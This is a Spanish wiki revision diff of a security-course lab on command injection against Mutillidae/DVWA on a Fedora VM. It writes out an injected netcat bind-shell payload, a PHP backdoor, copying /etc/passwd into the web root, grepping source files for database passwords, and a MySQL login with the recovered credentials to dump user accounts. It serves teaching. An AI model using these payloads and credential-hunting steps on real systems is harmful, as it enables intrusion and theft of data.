Herramientas de usuario

Herramientas del sitio


sad:fedora14:p3

Diferencias

Muestra las diferencias entre dos versiones de la página.

Enlace a la vista de comparación

Ambos lados, revisión anteriorRevisión previa
Próxima revisión
Revisión previa
sad:fedora14:p3 [2018/01/30 15:37] José Manuel Guallarsad:fedora14:p3 [2019/01/04 13:18] (actual) – editor externo 127.0.0.1
Línea 47: Línea 47:
 Instrucciones: Instrucciones:
 <code basH> <code basH>
-www.colegiomontessori.com; mkfifo /tmp/pipe; sh /tmp/pipe | nc -l 4444> /tmp/pipe+www.colegiomontessori.com; mkfifo /tmp/pipe; sh /tmp/pipe | nc -l 4444 > /tmp/pipe
 </code> </code>
  
Línea 55: Línea 55:
  
 Esto permitirá que dos procesos se conecten a netcat. Esto permitirá que dos procesos se conecten a netcat.
-<code bash> + 
-nc -l 4444, le dice a netcat que escuche y permita conexiones en el puerto 4444. +**nc -l 4444,** le dice a netcat que escuche y permita conexiones en el puerto 4444. 
-</code>+
  
 {{:sad:fedora:p3:2.png?500|}} {{:sad:fedora:p3:2.png?500|}}
Línea 74: Línea 74:
 Escribir las siguientes sentencias en el BackTrack Escribir las siguientes sentencias en el BackTrack
  
-Reemplazar 192.168.1.111 con la dirección IP de Fedora.+Reemplazar la ip con la dirección IP de tu Fedora.
  
-**nc 192.168.153.39 4444**+<code bash> 
 +root@bt:~# nc 192.168.153.39 4444 
 +</code>
  
 {{:sad:fedora:p3:04.png?500|}} {{:sad:fedora:p3:04.png?500|}}
Línea 82: Línea 84:
 Utilicamos el BackTrack para conectarse a la sesión Netcat de Fedora en el puerto 4444 Utilicamos el BackTrack para conectarse a la sesión Netcat de Fedora en el puerto 4444
  
-**hostname**+''**hostname**''
  
 Este es el nombre de host del servidor que aloja DVWA. Este es el nombre de host del servidor que aloja DVWA.
  
-**whoami**+''**whoami**''
  
 Es decir, ¿con quién me conecto? Es decir, ¿con quién me conecto?
  
-**pwd**+''**pwd**''
  
 directorio de trabajo directorio de trabajo
  
-**uname -a**+''**uname -a**''
  
-muestra informacion del sistema operatico+muestra informacion del sistema operativo
  
-**cat /etc/passwd > passwd.txt**+''**cat /etc/passwd > passwd.txt**''
  
 crea passwd.txt localizado en /var/www/html/multillidae crea passwd.txt localizado en /var/www/html/multillidae
-ls -l $PWD/passwd.txt+ 
 +''**ls -l $PWD/passwd.txt**''
  
 lista el fichero passwd.txt lista el fichero passwd.txt
Línea 109: Línea 112:
 **volvemos al Firefox y abrimos otra pestaña y escribimos** **volvemos al Firefox y abrimos otra pestaña y escribimos**
  
-http://ip-fedora/mutillidae/passwd.txt+''** http://ip-fedora/mutillidae/passwd.txt**''
  
 {{:sad:fedora:p3:06.png?500|}} {{:sad:fedora:p3:06.png?500|}}
Línea 130: Línea 133:
 {{:sad:fedora:p3:07.png?500|}} {{:sad:fedora:p3:07.png?500|}}
  
-http://ip-fedora/multillidae/nc_connect.php+''**http://ip-fedora/mutillidae/nc_connect.php**''
  
-Ejecutamos nc_connect.php+Ejecutamos **nc_connect.php**
  
-http://ip-fedora/multillidae/nc_connect.php+''**http://ip-fedora/mutillidae/nc_connect.php**''
  
 veremos que en la web pone conectando..... veremos que en la web pone conectando.....
Línea 142: Línea 145:
 <code bash> <code bash>
  
-root@bt:~# nc 192.168.1.111 3333+root@bt:~# nc 192.168.153.39 3333
 whoami whoami
 ps -eaf | egrep '(3333|4444)' ps -eaf | egrep '(3333|4444)'
  
 </code> </code>
 +
 {{:sad:fedora:p3:08.png?500|}} {{:sad:fedora:p3:08.png?500|}}
 {{:sad:fedora:p3:09.png?500|}} {{:sad:fedora:p3:09.png?500|}}
  
-las dos primeras lineas es la ejecución del netcat via nslookup+Las dos primeras lineas es la ejecución del netcat via nslookup
  
 las ultimas lineas el la puerta trasera las ultimas lineas el la puerta trasera
Línea 158: Línea 162:
 primero vamos a ver nuestro directorio de trabajo primero vamos a ver nuestro directorio de trabajo
  
-**pwd**+''**pwd**''
  
-luego vamos a contar los scripts+luego vamos a contar los scripts\\
  
-**find * -name "*.php" | wc -l**+''**find * -name "*.php" | wc -l**''
  
-despues vamos a contar los archivos include de php+despues vamos a contar los archivos incluye de php\\
  
-**find * -name "*.inc" | wc -l**+''**find * -name "*.inc" | wc -l**'' 
 + 
 +lo siguiente sera buscar en cada archivo include (.inc) las palabras "password" "db" o "database"\\
  
-lo siguiente sera buscar en cada archivo include (.inc) las palabras "password" "db" o "database" 
 {{:sad:fedora:p3:10.png?500|}} {{:sad:fedora:p3:10.png?500|}}
 +
 <code bash> <code bash>
 find * -name "*.inc" | xargs grep -i password | egrep -i '(db|database)' find * -name "*.inc" | xargs grep -i password | egrep -i '(db|database)'
Línea 187: Línea 193:
 find * -name "*.php" | xargs grep -i password | egrep -i '(db|database)' | grep "=" | head -8 find * -name "*.php" | xargs grep -i password | egrep -i '(db|database)' | grep "=" | head -8
 </code> </code>
 +
 {{:sad:fedora:p3:12.png?500|}} {{:sad:fedora:p3:12.png?500|}}
 ahora buscamos lo mismo pero solo mostramos las 8 primeras lineas de la cabecera, y observamos que el nombre del script que contiene la contraseña de la Base de datos es MySQLHandler.php ahora buscamos lo mismo pero solo mostramos las 8 primeras lineas de la cabecera, y observamos que el nombre del script que contiene la contraseña de la Base de datos es MySQLHandler.php
Línea 203: Línea 210:
 echo "use nowasp; show tables;" | mysql -uroot -psamurai echo "use nowasp; show tables;" | mysql -uroot -psamurai
 </code> </code>
 +
 {{:sad:fedora:p3:14.png?500|}} {{:sad:fedora:p3:14.png?500|}}
  
-vamos a investigar el contenido de la tabla accounts+Vamos a investigar el contenido de la tabla accounts
  
 primer comando enseña los campos por columnas y por supuesto podemos ver el contenido de tablas primer comando enseña los campos por columnas y por supuesto podemos ver el contenido de tablas
Línea 228: Línea 236:
 ''** print de pantalla final**'' ''** print de pantalla final**''
  
-Tienes que realizar los siguientes pasos en el terminal de netcat nc_config.php+Tienes que realizar los siguientes pasos en el terminal de netcat nc_connect.php
  
 <code bash> <code bash>
sad/fedora14/p3.1517326671.txt.gz · Última modificación: (editor externo)